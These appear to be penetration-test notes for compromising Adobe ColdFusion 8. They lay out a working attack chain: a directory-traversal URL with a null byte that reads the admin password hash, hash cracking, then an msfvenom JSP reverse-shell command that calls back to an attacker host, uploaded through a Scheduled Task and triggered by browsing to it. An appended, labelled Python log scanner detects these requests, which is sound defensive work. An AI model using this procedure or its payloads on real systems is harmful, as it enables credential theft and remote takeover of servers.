The default paths contain 'cfide':
http://10.0.0.1/cfide/images
http://10.0.0.1/cfide/scripts
http://10.0.0.1/cfide/administrator
http://10.0.0.1/cfide/classes
http://10.0.0.1/cfide/debug
http://10.0.0.1/cfide/wizards
Searchsploit: multiple/remote/14641.py
➤ 1. Extract the password hash
http://10.0.0.1/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Example: password=AAFDC23870ECBCD3D557B6423A8982134E17927E
➤ 2. Crack the hash (SHA-1)
https://crackstation.net
➤ 1. Log in to the administrator interface
http://10.0.0.1/CFIDE/administrator/index.cfm
➤ 2. Create a Java (JSP) reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.194 LPORT=443 -f raw > exploit.jsp
➤ 3. Start an HTTP server from which the reverse shell will be downloaded
python3 -m http.server
➤ 4. Detect the mappings
From the menu, go to 'Server Settings' then 'Mappings'. Under 'Active ColdFusion Mappings', note the directory path.
Example: C:\Inetpub\wwwroot\CFIDE
➤ 5. Upload the reverse shell
From the menu, go to 'Debugging & Logging' then 'Scheduled Tasks'. Then complete the fields as listed below:
• Task name: Name of the task
• Frequency: One time (executed once)
• URL: Local HTTP URL where the exploit is located
• Publish: Selected
• File: The path discovered in the mappings step plus the name of the exploit (e.g. C:\Inetpub\wwwroot\CFIDE\exploit.jsp)

➤ 6. Click Submit
➤ 7. Browse to the exploit path
http://10.0.0.1/CFIDE/exploit.jsp
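A defender-side check for the requests this procedure leaves in web server access logs (added example, not part of the original notes): it flags requests under `/CFIDE/` whose `locale` parameter carries traversal sequences or a null byte, and requests for `.jsp` files under `/CFIDE/`. The log format, the sample lines and the assumption that no legitimate `.jsp` file is served from `/CFIDE/` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../lib/password.properties%00en HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jan/2024:10:09:00 +0000] "GET /cfide/exploit.jsp HTTP/1.1" 200 0
10.0.0.5 - - [01/Jan/2024:10:10:00 +0000] "GET /CFIDE/scripts/cfform.js HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(target):
    """Return a finding label for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    if not path.startswith("/cfide/"):
        return None
    # parse_qs percent-decodes values: %00 becomes "\x00", %2e%2e%2f becomes "../".
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key.lower() != "locale":  # match the parameter name in any letter case
            continue
        if any("\x00" in v or "../" in v or "..\\" in v for v in values):
            return "locale-traversal"
    # Assumption: nothing legitimate is served as .jsp from the CFIDE tree.
    if path.endswith(".jsp"):
        return "jsp-under-cfide"
    return None


def scan(log_text):
    """Return (client_ip, finding, target) for every suspicious log line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and (label := classify(m.group(2))):
            findings.append((m.group(1), label, m.group(2)))
    return findings


if __name__ == "__main__":
    for ip, label, target in scan(SAMPLE_LOG):
        print(f"{label:18} {ip:12} {target}")
```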